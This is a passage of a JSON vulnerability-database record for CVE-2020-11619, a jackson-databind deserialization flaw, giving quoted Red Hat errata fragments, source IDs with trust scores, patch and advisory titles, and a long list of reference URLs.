org.apache.openjpa.ee.WASRegistryManagedRuntime\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n\n5. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nInstallation instructions are available from the Fuse 7.7.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl\n1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents\n1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API\n1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service\n1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake\n1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries\n1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. \n1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 18.0",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11619"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
},
{
"db": "VULHUB",
"id": "VHN-164215"
},
{
"db": "VULMON",
"id": "CVE-2020-11619"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "157834"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158095"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11619",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "157834",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159724",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "160601",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158095",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4471",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2071",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1368",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3703",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1857",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48396",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2020-28475",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-164215",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11619",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164215"
},
{
"db": "VULMON",
"id": "CVE-2020-11619"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "157834"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158095"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
},
{
"db": "NVD",
"id": "CVE-2020-11619"
}
]
},
"id": "VAR-202004-0345",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-164215"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:51:58.423000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Block one more gadget type (SSRF, spring-jpa, CVE-2020-11619) #2680",
"trust": 0.8,
"url": "https://github.com/FasterXML/jackson-databind/issues/2680"
},
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115606"
},
{
"title": "Red Hat: Important: rh-maven35-jackson-databind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202320 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.4.0 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205625 - Security Advisory"
},
{
"title": "Red Hat: Important: EAP Continuous Delivery Technical Preview Release 18 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202565 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple Security Vulnerabilities in Jackson-Databind Affect IBM Sterling B2B Integrator",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9bb4efe27af18414a7db703d1dd40070"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "Red Hat: Important: Satellite 6.8 release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204366 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2020-130"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11619"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164215"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
},
{
"db": "NVD",
"id": "CVE-2020-11619"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200511-0004/"
},
{
"trust": 1.8,
"url": "https://github.com/fasterxml/jackson-databind/issues/2680"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3cissues.geode.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3cissues.geode.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11619"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1368/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2071/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3703/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157834/red-hat-security-advisory-2020-2320-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1857/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/160601/red-hat-security-advisory-2020-5625-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4471/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158095/red-hat-security-advisory-2020-2565-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-denial-of-service-via-spring-aop-methodlocatingfactorybean-serialization-gadgets-typing-32066"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48396"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159724/red-hat-security-advisory-2020-4366-01.html"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:2320"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4366"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:5625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso\u0026downloadtype=distributions\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2020:1414"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.8/html/release_notes_for_red_hat_process_automation_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhpam\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xdata.grid\u0026downloadtype=securitypatches\u0026version=7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3192"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
